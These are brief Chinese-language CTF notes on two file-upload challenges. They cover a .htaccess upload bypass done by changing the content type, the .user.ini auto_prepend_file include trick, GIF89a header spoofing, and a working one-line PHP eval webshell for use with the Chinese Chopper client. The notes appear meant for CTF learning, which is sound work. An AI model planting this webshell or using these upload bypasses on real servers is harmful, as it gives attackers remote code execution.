[MRCTF2020]你传xx呢(名字打不出来,会被封)
- 注意使用菜刀工具时写对链接,否则可能不会报错,只会显示返回空。
- 注意多种绕过方法混合使用,本题就是.htaccess上传时抓包改type为image/png。
[SUCTF 2019]CheckIn
- .user.ini解析漏洞:此文件为配置文件,其内容写:
auto_prepend_file = 1.png
auto_append_file = 1.png
这时当文件夹下有.user.ini时,php文件执行时会在头尾分别文件包含1.png文件。(注意,如果把1.png文件改为其他php文件如1.php,仅能包含这一个文件,如若想多包含,只需要在1.php里写上其他包含文件即可。)
这时候随意访问该文件夹下php文件,则会文件包含1.png里面的一句马。 - gif图文件头欺骗:GIF89a?
- 无问号php一句马:<script language=“php”>@eval($_REQUEST[8])</script>
- 注意一句马用菜刀工具时要用post或者request